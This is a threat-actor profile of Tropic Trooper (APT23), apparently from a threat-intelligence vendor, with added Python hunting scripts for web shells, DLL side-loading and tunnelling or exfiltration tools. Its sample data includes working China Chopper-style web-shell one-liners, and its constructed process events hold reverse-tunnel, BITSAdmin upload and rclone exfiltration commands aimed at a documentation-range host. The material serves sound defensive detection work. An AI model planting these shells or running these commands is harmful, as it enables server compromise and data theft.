Tropic Trooper, also known as Pirate Panda and APT23, is a Chinese state-sponsored cyber espionage group that has been active since at least 2011. It primarily targets sensitive sectors such as government, healthcare, and transportation, with operations concentrated on Taiwan, Hong Kong, and the Philippines, where it relies on spear-phishing, exploitation of exposed servers, and custom malware to compromise networks and steal sensitive information.
Threat actor card of Tropic Trooper
Tropic Trooper is a cyber espionage group attributed to Chinese state-sponsored activity and active since at least 2011. It is tracked under several names, including Pirate Panda, APT23, Iron, KeyBoy, Bronze Hobart, and Earth Centaur. The group is known for targeted attacks against sectors tied to national interests, such as government, telecommunications, and technology. With a strong emphasis on intelligence gathering, Tropic Trooper uses social engineering and custom malware to infiltrate networks and extract sensitive data. Its operations typically align with the geopolitical interests of China.
Their attacks frequently involve the infiltration of networks through spear-phishing campaigns, which are designed to deceive individuals into providing access to confidential data or systems. Over the years, Tropic Trooper has adapted its tactics, demonstrating a keen ability to innovate and evade detection, which makes them a persistent threat in the cyber landscape. Their targeted approach and technical prowess underscore their significance as a key player among state-sponsored threat actors.
Tropic Trooper initiates attacks primarily through spear-phishing campaigns, carefully crafted with extensive social engineering to appeal directly to their targets. These emails often contain malicious attachments, such as Microsoft Office files or PDFs, or embed links that, once clicked, lead to websites hosting exploit kits.
Point of entry, a malicious doc (TrendMicro)
They exploit common application vulnerabilities, including those in Microsoft Office, to execute malware payloads that establish a foothold in the victim’s system. Tropic Trooper’s spear-phishing emails are customized, often incorporating language, subject matter, and scenarios relevant to the target’s environment to maximize the chances of engagement. This calculated initial access strategy enables Tropic Trooper to breach networks within government, healthcare, and high-value sectors across Southeast Asia.
Phishing is not the only way in. Tropic Trooper also exploits vulnerabilities in internet-facing web servers, notably Microsoft Exchange Server, and plants web shells on them to create a second, phishing-independent access path.
A malicious module was found inside Umbraco CMS, an open-source .NET content management system, on the compromised server (Securelist)
Tools used in this step in the 2021 and 2024 attacks:
Fscan: An open-source scanner used to find open ports, exposed services, and vulnerabilities on target hosts. Tropic Trooper also uses an ICMP-based script to identify reachable hosts before exploitation.
Swor: A penetration-testing tool used to obtain initial access; it bundles Mimikatz for credential theft and FRP for reverse proxying, both used in follow-on exploitation.
Following initial access, Tropic Trooper deploys a mix of custom malware and shared tooling for persistence, including TClient, Yahoyah, and the China Chopper web shell. These tools let the group keep continuous access to compromised systems and systematically collect, encrypt, and transmit sensitive data to its servers over long periods. To avoid detection, it uses obfuscation and encryption and periodically modifies its malware to defeat signature-based controls. This persistent access both secures a stable position in the network and supports the group’s broader espionage objectives, allowing it to collect intelligence and track target activity over time.
Malicious function implementing China Chopper registered as a callback function (Securelist)
Tools used:
China Chopper: A very small web shell (the server-side component is a one-line script) used for persistent access to compromised web servers, letting Tropic Trooper retain control even if other implants are detected.
Yahoyah: Maintains persistence while keeping its payload encrypted, which makes it harder to detect and lets the attacker reload it as needed.
PoisonIvy: Ensures persistence through autostart execution and system modifications that re-establish access after a reboot.
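The China Chopper server-side stub is a one-liner that evaluates whatever the client sends in a request parameter, which is what makes it both tiny and easy to fingerprint in source form. The following hunt script is an added example, not SOCRadar’s code or tooling from the reports it cites: it walks a web root, matches the publicly documented ASPX and PHP China Chopper stubs plus a generic "eval primitive fed from the request object" rule, and reports which files hit. The sample web root is constructed in a temporary directory so the script runs offline; every file name and path in it is illustrative.

```python
"""Hunt a web root for China Chopper-style one-line web shells.

Added example (not SOCRadar's code and not tooling from the cited reports).
The signatures are the publicly documented China Chopper server-side stubs; the
sample web root is constructed in a temporary directory so the script runs
offline, and every file name in it is illustrative.
"""
import re
import tempfile
from pathlib import Path

# Server-side China Chopper stubs are one-liners that eval a request parameter:
#   ASPX: <%@ Page Language="Jscript"%><%eval(Request.Item["pw"],"unsafe");%>
#   PHP:  <?php @eval($_POST['pw']);?>
SHELL_PATTERNS = {
    "chopper_aspx": re.compile(
        r'eval\s*\(\s*Request\.Item\s*\[\s*["\'][^"\']+["\']\s*\]\s*,\s*["\']unsafe["\']',
        re.IGNORECASE),
    "chopper_php": re.compile(
        r'@?eval\s*\(\s*\$_(?:POST|REQUEST|GET)\s*\[\s*["\'][^"\']+["\']\s*\]\s*\)',
        re.IGNORECASE),
    # Generic catch-all: an eval/exec primitive fed straight from the request
    # object (also covers classic-ASP shells such as execute(Request("cmd"))).
    "eval_of_request": re.compile(
        r'\b(?:eval|execute|shell_exec|passthru|system)\s*\([^;]*?\bRequest\b',
        re.IGNORECASE),
}
WEB_EXTS = {".aspx", ".ashx", ".asmx", ".asp", ".php", ".cshtml"}


def scan_file(path: Path) -> list[str]:
    """Return the names of every signature that matches the file's content."""
    text = path.read_text(errors="ignore")
    return sorted(name for name, rx in SHELL_PATTERNS.items() if rx.search(text))


def scan_webroot(root: Path) -> list[dict]:
    """Walk the web root and report script files that match a web-shell signature."""
    findings = []
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in WEB_EXTS:
            hits = scan_file(path)
            if hits:
                findings.append({"path": path.relative_to(root).as_posix(), "hits": hits})
    return findings


def build_sample_webroot() -> Path:
    """Constructed sample tree: two Chopper stubs, one classic-ASP shell, two benign files."""
    root = Path(tempfile.mkdtemp(prefix="webroot_"))
    samples = {
        # Chopper ASPX stub dropped under a plugin folder (illustrative path).
        "App_Plugins/Stats/chart.aspx":
            '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>',
        # Chopper PHP stub disguised as an image-handling script.
        "media/uploads/thumb.php": "<?php @eval($_POST['cmd']);?>",
        # Classic-ASP one-liner caught only by the generic rule.
        "legacy/cmd.asp": '<% execute(Request("cmd")) %>',
        # Benign Razor view and a benign ASP page that use no eval primitive.
        "Views/Home/Index.cshtml": "@model PageModel\n<h1>@Model.Title</h1>",
        "legacy/list.asp": '<% Set fso = Server.CreateObject("Scripting.FileSystemObject") %>',
    }
    for rel, content in samples.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(content)
    return root


if __name__ == "__main__":
    for finding in scan_webroot(build_sample_webroot()):
        print(f"{finding['path']}: {', '.join(finding['hits'])}")
```

Two caveats from the Kaspersky case apply when running this against a real server. First, the China Chopper logic there was compiled into an Umbraco module (a .NET assembly) rather than left as a script file, so a source-text scan finds nothing; for that variant, compare the assemblies under the site’s bin directory against a known-good Umbraco install and inspect modules registered as request callbacks. Second, the generic rule is deliberately broad and will flag legitimate dynamic-code pages, so treat its hits as triage candidates rather than confirmed shells.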
Once established, Tropic Trooper seeks to elevate its privileges within the infected network. They exploit vulnerabilities in widely used applications or leverage privilege escalation exploits tailored to the target’s system environment. By doing so, they transition from low-level user access to higher-level administrative permissions, granting them enhanced control over critical network resources and security configurations. This escalation allows them to disable security controls selectively and to navigate the environment with greater freedom, ultimately facilitating deeper infiltration and access to high-value data assets.
In one 2024 intrusion, Kaspersky reported that the attackers used DLL search-order hijacking to implant backdoor loaders (datast.dll and VERSION.dll). The technique plants a malicious DLL next to a legitimate executable that resolves that DLL by name, so the Windows loader picks up the planted copy from the executable’s own directory before the system copy and runs it as if it were part of the program. Once loaded, datast.dll decrypts and executes the shellcode for the next malware stage, calling functions in the second DLL to conceal its activity. The attackers reportedly used Umbraco web shells to place these files on the compromised servers.
Code stub responsible for decrypting the next stage (Securelist)
Tools used:
ShadowPad: Utilized for privilege escalation through dynamic-link library injection, bypassing security controls for enhanced access.
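Two properties of the datast.dll / VERSION.dll pair make it huntable without any malware signature: one of the files carries the name of a system DLL but sits outside the system directories, and both were dropped beside an executable in a location the web application could write to. The script below is an added example, not code from the Kaspersky report or SOCRadar; it checks exactly those two signals across a directory tree. The tree is constructed in a temporary directory, the host executable name svc_update.exe is hypothetical, and the DLL name list beyond version.dll is a small subset of publicly known side-loading targets.

```python
"""Hunt for DLL search-order hijacking candidates of the datast.dll / VERSION.dll kind.

Added example, not code from the Kaspersky report or SOCRadar. Two signals are
checked: a DLL carrying a system DLL's name (VERSION.dll) outside System32 and
SysWOW64, and any DLL dropped beside an executable inside a directory a web
application or low-privilege user can write to. The directory tree is
constructed in a temp dir; every path and file name in it is illustrative.
"""
import tempfile
from pathlib import Path

# System DLLs frequently abused for side-loading: many EXEs import them by name
# and the loader checks the EXE's own directory before System32. version.dll is
# the name from the 2024 Tropic Trooper intrusion; the others are well-known
# side-loading targets from public hijack lists (subset, assumption).
HIJACKABLE_SYSTEM_DLLS = {
    "version.dll", "dbghelp.dll", "cryptsp.dll", "wtsapi32.dll",
    "userenv.dll", "profapi.dll", "dwmapi.dll", "winmm.dll",
}
SYSTEM_DIRS = ("windows/system32/", "windows/syswow64/", "windows/winsxs/")
# Locations a web shell or an unprivileged account can typically write to.
WRITABLE_ROOTS = ("inetpub/", "programdata/", "users/", "temp/", "tmp/")


def hunt_sideload_candidates(root: Path) -> list[dict]:
    """Return DLLs that look planted for search-order hijacking, with the reasons."""
    findings = []
    for dll in sorted(root.rglob("*")):
        if not dll.is_file() or dll.suffix.lower() != ".dll":
            continue
        rel = dll.relative_to(root).as_posix()
        low = rel.lower()
        if any(low.startswith(d) for d in SYSTEM_DIRS):
            continue  # the legitimate copy lives here
        reasons = []
        if dll.name.lower() in HIJACKABLE_SYSTEM_DLLS:
            reasons.append("system DLL name outside the system directories")
        exes = [e.name for e in dll.parent.iterdir() if e.suffix.lower() == ".exe"]
        if exes and any(low.startswith(w) for w in WRITABLE_ROOTS):
            reasons.append(f"DLL beside executable {exes[0]} in a writable location")
        if reasons:
            findings.append({"path": rel, "reasons": reasons})
    return findings


def build_sample_tree() -> Path:
    """Constructed sample of a system drive; contents are placeholders, only names matter."""
    root = Path(tempfile.mkdtemp(prefix="drive_c_"))
    files = [
        "Windows/System32/version.dll",                # legitimate copy, skipped
        "inetpub/wwwroot/umbraco/bin/svc_update.exe",  # hypothetical EXE abused as side-load host
        "inetpub/wwwroot/umbraco/bin/VERSION.dll",     # planted loader next to it
        "inetpub/wwwroot/umbraco/bin/datast.dll",      # planted decryptor next to it
        "Program Files/Vendor/App/app.exe",            # benign vendor install
        "Program Files/Vendor/App/vendor.dll",         # benign companion DLL
        "Users/Public/Downloads/dbghelp.dll",          # stray system-named DLL, no EXE beside it
    ]
    for rel in files:
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(b"MZ")
    return root


if __name__ == "__main__":
    for f in hunt_sideload_candidates(build_sample_tree()):
        print(f["path"], "->", "; ".join(f["reasons"]))
```

On a live host, point the hunt at the web root and ProgramData first, and follow each hit with an Authenticode check of both the DLL and its neighbouring executable: the side-load host is usually a legitimately signed binary copied out of place, while the planted DLL is unsigned or signed by an unrelated publisher. The second rule keys on the executable neighbour rather than the DLL name precisely because datast.dll has no system-DLL name to match.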
Upon achieving elevated privileges, Tropic Trooper initiates lateral movement, systematically navigating the network to extend their reach across interconnected devices and servers. Using reconnaissance tools, they map network topologies, identify accessible resources, and pinpoint potential vulnerabilities in the organization’s infrastructure. They then employ various propagation techniques, including credential harvesting and exploitation of network misconfigurations, to spread to additional systems. By doing so, Tropic Trooper ensures that they retain access to multiple points within the network, allowing them to re-establish connections even if detection efforts uncover some parts of their operation.
Tools used:
Neo-reGeorg: A web-shell-based tunnelling tool that exposes a local SOCKS proxy and relays its traffic through a script planted on a compromised web server, allowing Tropic Trooper to pivot into the internal network over ordinary HTTP and evade network security controls.
FRPC (Fast Reverse Proxy Client): Assists in lateral movement by exposing local servers behind firewalls.
Chisel: Facilitates TCP/UDP tunneling, allowing traffic forwarding across the compromised network.
Data exfiltration is the final objective, as Tropic Trooper systematically targets and extracts classified or strategically valuable information, including government documents, healthcare records, and military data. Once they’ve mapped out the network and identified high-priority assets, they employ data compression, encryption, and stealthy data transfer methods to exfiltrate information undetected. Often, exfiltration is staged to avoid triggering network alarms; Tropic Trooper minimizes data volumes or utilizes obscure channels to avoid standard detection protocols. Through encrypted tunnels, they transfer this intelligence to remote command and control servers, focusing on data that supports their long-term intelligence and espionage goals in political, economic, and security domains.
Tools used:
SharpHound: Maps Active Directory relationships and identifies key systems and paths for further infiltration.
USBferry: Used for network discovery and spreading across devices connected through removable media.
RClone: Syncs files to and from cloud storage for large-scale data exfiltration.
BITSAdmin: Transfers data over alternative protocols like BITS Jobs to avoid detection.
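The tunnelling tools in the lateral-movement list (Neo-reGeorg, FRPC, Chisel) and the exfiltration tools above (SharpHound, RClone, BITSAdmin) all leave characteristic command lines at process creation, which is usually the earliest and cheapest place to catch them. The detector below is an added example, not SOCRadar’s detection content or rules from the cited reports: it runs a small set of command-line rules over process-creation events whose fields mirror what Sysmon Event ID 1 or EDR telemetry carries. The events are constructed, and every host name, user, path, and remote address in them is made up (203.0.113.10 is a documentation-range address).

```python
"""Flag process launches of the tunnelling and exfiltration tooling listed above.

Added example, not SOCRadar's detection content or the rules from the cited
reports. Input is a list of process-creation events (fields mirror a Sysmon
Event ID 1 / EDR record); the events below are constructed and every host,
user, path and remote address in them is made up.
"""
import re

# rule name -> (regex over the command line, what a hit indicates)
RULES = {
    "chisel_reverse_tunnel": (
        re.compile(r"\bchisel(?:\.exe)?\b.*\bclient\b.*\bR:", re.I),
        "Chisel client opening a reverse tunnel to an external server"),
    "frpc_reverse_proxy": (
        re.compile(r"\bfrpc(?:\.exe)?\b.*(?:-c\s|--config\s|\.(?:ini|toml)\b)", re.I),
        "FRP client started with a config exposing internal services"),
    "neoreg_tunnel": (
        re.compile(r"\bneoreg(?:\.py)?\b", re.I),
        "Neo-reGeorg client tunnelling SOCKS traffic through a web shell"),
    "rclone_to_remote": (
        # remote names are whitespace-separated tokens ending in ':'; {2,} skips drive letters
        re.compile(r"\brclone(?:\.exe)?\b.*\b(?:copy|sync|move)\b.*\s[A-Za-z0-9_-]{2,}:", re.I),
        "RClone pushing files to a configured cloud remote"),
    "bitsadmin_transfer": (
        re.compile(r"\bbitsadmin(?:\.exe)?\b.*/(?:transfer|addfile)\b", re.I),
        "BITSAdmin job moving files over BITS"),
    "sharphound_collection": (
        re.compile(r"\bsharphound(?:\.exe|\.ps1)?\b|invoke-bloodhound", re.I),
        "SharpHound enumerating Active Directory"),
}


def detect(events: list[dict]) -> list[dict]:
    """Return one alert per (event, rule) pair whose command line matches."""
    alerts = []
    for ev in events:
        for name, (rx, desc) in RULES.items():
            if rx.search(ev["cmdline"]):
                alerts.append({"rule": name, "host": ev["host"], "user": ev["user"],
                               "cmdline": ev["cmdline"], "desc": desc})
    return alerts


# Constructed process-creation events (Sysmon EID 1 style); all values are made up.
SAMPLE_EVENTS = [
    {"host": "WEB01", "user": "IIS APPPOOL\\umbraco",
     "cmdline": r"C:\Users\Public\chisel.exe client 203.0.113.10:8080 R:socks"},
    {"host": "WEB01", "user": "IIS APPPOOL\\umbraco",
     "cmdline": r"C:\ProgramData\frpc.exe -c C:\ProgramData\frpc.ini"},
    {"host": "JUMP02", "user": "CORP\\svc_backup",
     "cmdline": "python neoreg.py -k s3cr3t -u http://203.0.113.10/tunnel.aspx"},
    {"host": "FS03", "user": "CORP\\svc_backup",
     "cmdline": r"rclone.exe copy D:\Share\Finance gdrive:backup --transfers 8"},
    {"host": "FS03", "user": "CORP\\svc_backup",
     "cmdline": r"bitsadmin /transfer job1 /upload /priority normal http://203.0.113.10/up C:\Windows\Temp\data.7z"},
    {"host": "JUMP02", "user": "CORP\\svc_backup",
     "cmdline": "SharpHound.exe -c All --zipfilename out.zip"},
    # Benign activity that must not fire.
    {"host": "FS03", "user": "NT AUTHORITY\\SYSTEM",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs"},
    {"host": "FS03", "user": "CORP\\svc_backup",
     "cmdline": r"robocopy D:\Share \\fileserver\backup /MIR"},
]


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a['rule']}] {a['host']} {a['user']}: {a['cmdline']}")
```

These rules key on the tool name in the command line, so a renamed chisel or rclone binary slips past them; in an EDR, pair each rule with the binary’s hash or import hash, and keep the argument-only parts (the "client … R:" shape of a reverse tunnel, a "remote:" target after copy/sync) as weaker fallback rules that survive renaming. Note also that the SharpHound and Neo-reGeorg patterns flag the tools, not the technique; BloodHound-style LDAP enumeration from an unexpected host is visible in domain controller logs even when the collector is custom.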
After 2020, two comprehensive reports, one from Trend Micro and another from Kaspersky, have been released to the community. The differences in each report’s approach highlight the ongoing evolution of the group’s tactics. Between 2021 and 2024, Tropic Trooper significantly expanded and evolved its operations. Originally focused on government, healthcare, and high-tech sectors in regions like Taiwan, Hong Kong, and the Philippines, the group (tracked by Trend Micro as Earth Centaur) had broadened its geographical and strategic scope by 2023, targeting transportation, governmental agencies, and human rights organizations in Southeast Asia and the Middle East. This shift included a focus on sensitive geopolitical areas and issues, such as Middle Eastern governments and human rights organizations linked to ongoing conflicts.
During this period, Tropic Trooper’s tactics also became more sophisticated. They continued using known exploits for entry—particularly in vulnerable Microsoft Exchange and Adobe ColdFusion servers—and employed a revamped set of malware tools. For example, in 2024, they introduced the “Crowdoor” backdoor variant to deliver Cobalt Strike payloads, enabling them to establish persistent access and gather sensitive information covertly. This is alongside the continued use of Quasar RAT, a tool they’d utilized in previous years but with increased efficiency through enhancements like custom decryption algorithms and DLL side-loading.
Their technical approach increasingly mirrors advanced red-teaming techniques, which reflect an evolution toward a more agile, adaptable operation style, enabling them to bypass network security more effectively. Their goals, however, remain consistent with prior espionage-focused activities, with an emphasis on internal data collection from compromised networks for long-term strategic use.
Tropic Trooper’s attacks are concentrated on highly sensitive sectors, primarily in Southeast Asia. Government institutions, healthcare organizations, and military entities in Taiwan, the Philippines, and Hong Kong have been frequent targets. Their operations focus on accessing data that could provide strategic advantages in political, economic, or military arenas. By compromising governmental networks, Tropic Trooper aims to gather intelligence that informs national security interests, while attacks on healthcare sectors often seek to obtain sensitive personal and medical records, which can further their political or tactical objectives.
Tropic Trooper’s most common targets are government agencies and ministries. By infiltrating these networks, they gather data that could serve national intelligence or political strategies, focusing on sectors involved in policy-making, economic development, and international relations.
Healthcare facilities and research centers are targeted for their valuable data on citizens, medical records, and scientific advancements. Tropic Trooper leverages this information to analyze population health data or disrupt public health infrastructure. Attacks on these sectors are often strategic, serving geopolitical or economic motives aligned with the interests of their sponsors.
The group also has a history of breaching military networks, seeking out plans, defense strategies, and communications data. These intrusions into defense sectors are intended to obtain intelligence on military capabilities, troop movements, and strategic defense postures, providing critical information that could be advantageous in regional security dynamics.
Organizations facing potential threats from Tropic Trooper can employ a comprehensive defense strategy to detect, prevent, and respond to cyber incidents. By implementing the following security measures, companies can strengthen their defenses and reduce the likelihood of compromise:
Since Tropic Trooper frequently relies on spear-phishing emails to initiate attacks, organizations should implement robust email filtering solutions to detect and block malicious emails. Training employees to recognize phishing attempts and report suspicious emails is essential to prevent initial access.
Limiting user privileges based on job roles and implementing Multi-Factor Authentication (MFA) can prevent Tropic Trooper from easily gaining unauthorized access to sensitive systems. Privileged Account Management (PAM) tools can monitor and secure high-level access accounts, reducing the likelihood of lateral movement within the network.
To limit the spread of an intrusion, organizations should segment their networks by grouping systems with similar functions together and restricting communication between them. This containment measure can prevent threat actors from easily moving between different network segments, reducing the overall impact of a breach.
Deploying advanced EDR solutions on endpoints allows security teams to monitor unusual activity, detect malware, and analyze suspicious files in real time. EDR tools offer insight into endpoint activity, aiding in the early detection of Tropic Trooper’s custom malware and persistence mechanisms.
Organizations should prioritize regular software updates and patches for all systems and applications. Addressing known vulnerabilities can limit potential attack vectors exploited by groups like Tropic Trooper, reducing the risk of exploitation and unauthorized access.
Continuous network monitoring and Intrusion Detection Systems (IDS) can help detect and mitigate unauthorized traffic within the organization’s infrastructure. By identifying abnormal traffic patterns or unauthorized access attempts, security teams can respond swiftly to potential threats, reducing the risk of data exfiltration.
Having an incident response plan tailored to Advanced Persistent Threats (APTs) allows security teams to respond effectively if Tropic Trooper infiltrates the network. Cyber threat intelligence (CTI) teams can enhance this plan by staying informed of Tropic Trooper’s latest TTPs, enabling proactive defense and faster identification of attack patterns.
SOCRadar’s Extended Cyber Threat Intelligence (XTI) offers support to organizations combating evolving threat actors like Tropic Trooper through a suite of advanced cybersecurity tools and services.
SOCRadar’s Operational Intelligence/Threat Actor Intelligence
Tropic Trooper remains a formidable and adaptive threat, continually targeting sensitive sectors across East Asia with sophisticated techniques and a long history of state-sponsored espionage. Known by various names, including Pirate Panda and APT 23, this group has honed its approach to employ advanced malware, spear-phishing tactics, and lateral movement strategies that enable them to infiltrate and extract valuable information from critical infrastructures. Their operations reflect a strategic focus aligned with China’s geopolitical interests, making them a key player in the cyber threat landscape.
To combat the persistent threat posed by Tropic Trooper, organizations must adopt a comprehensive cybersecurity framework. This should include enhanced email security, strict access controls, network segmentation, and advanced endpoint detection solutions. By fostering a proactive security culture and maintaining an updated incident response plan, organizations can significantly bolster their defenses against the sophisticated tactics employed by Tropic Trooper and similar state-sponsored actors.
Sources: [1],[2],[3]
For the latest IoCs and YARA / Sigma Rules visit SOCRadar Platform’s Threat Actor Intelligence tab.